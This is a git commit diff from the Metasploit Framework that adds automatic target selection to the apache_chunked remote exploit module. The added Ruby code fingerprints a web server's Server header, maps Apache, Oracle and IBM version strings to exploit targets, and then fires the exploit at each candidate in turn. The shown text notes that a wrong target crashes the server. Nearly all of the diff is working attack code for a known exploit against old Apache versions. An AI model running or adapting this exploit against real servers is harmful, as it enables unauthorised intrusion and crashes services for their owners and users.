add auto_target to apache_chunked exploit - should reduce run duration in most cases

git-svn-id: file:///home/svn/framework3/trunk@8980 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-04-02 16:26:01 +00:00
parent 776259e3c6
commit eb003518ce
1 changed files with 74 additions and 7 deletions

View File

@ -9,10 +9,8 @@
# http://metasploit.com/framework/ # http://metasploit.com/framework/
## ##
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking Rank = GoodRanking
@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
automatically restart, so if you use the wrong target value, automatically restart, so if you use the wrong target value,
the server will crash. the server will crash.
}, },
'Author' => 'hdm', 'Author' => [ 'hdm', 'jduck' ],
'Version' => '$Revision$', 'Version' => '$Revision$',
'References' => 'References' =>
[ [
@ -194,12 +192,82 @@ class Metasploit3 < Msf::Exploit::Remote
return code return code
end end
def auto_target
response = send_request_raw({'uri' => '/'}, 5)
targets_to_try = []
if response.nil?
print_error("No response to request")
return targets_to_try
end
server_hdr = response['Server']
print_status("Server: #{server_hdr}")
case server_hdr
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
targets_to_try.push(targets[9])
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
targets_to_try.push(targets[10])
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
targets_to_try.push(targets[11])
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
# fall through
else
# check for apache version ranges
if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
version = $1
#print_status("Apache version: #{version}")
ver = version.split('.')
if (ver.length == 3)
major = ver[0].to_i
minor = ver[1].to_i
rev = ver[2].to_i
if (major == 1 and minor == 3)
targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
targets_to_try.push(targets[4]) if (rev == 22)
# Add the remaining targets, regardless of quality...
if (server_hdr =~ /Win32/)
# targets 4, 5, 6, 7
if (rev >= 17 and rev <= 24)
targets_to_try.push(targets[5])
targets_to_try.push(targets[6])
end
targets_to_try.push(targets[7])
targets_to_try.push(targets[8])
end
end
# Version 1.0 - 1.2, Fall through...
end
# ServerTokens setting isn't giving up enough information ... Might need to try?
end
# Not Apache? Fall through...
end
targets_to_try
end
#
# If auto, ask the auto_target function for a list of
# targets to try...
#
# If not auto, just try the selected target.
#
def exploit def exploit
if target_index == 0 if target_index == 0
targets.each_with_index { |targ, idx| targs = auto_target
next if idx == 0 print_status("Auto-targeting returned #{targs.length} candidates...")
targs.each_with_index { |targ, idx|
# Never try the debug target automatically :)
next if targ.name =~ /Debug/ next if targ.name =~ /Debug/
exploit_target(targ) exploit_target(targ)
} }
else else
@ -257,4 +325,3 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end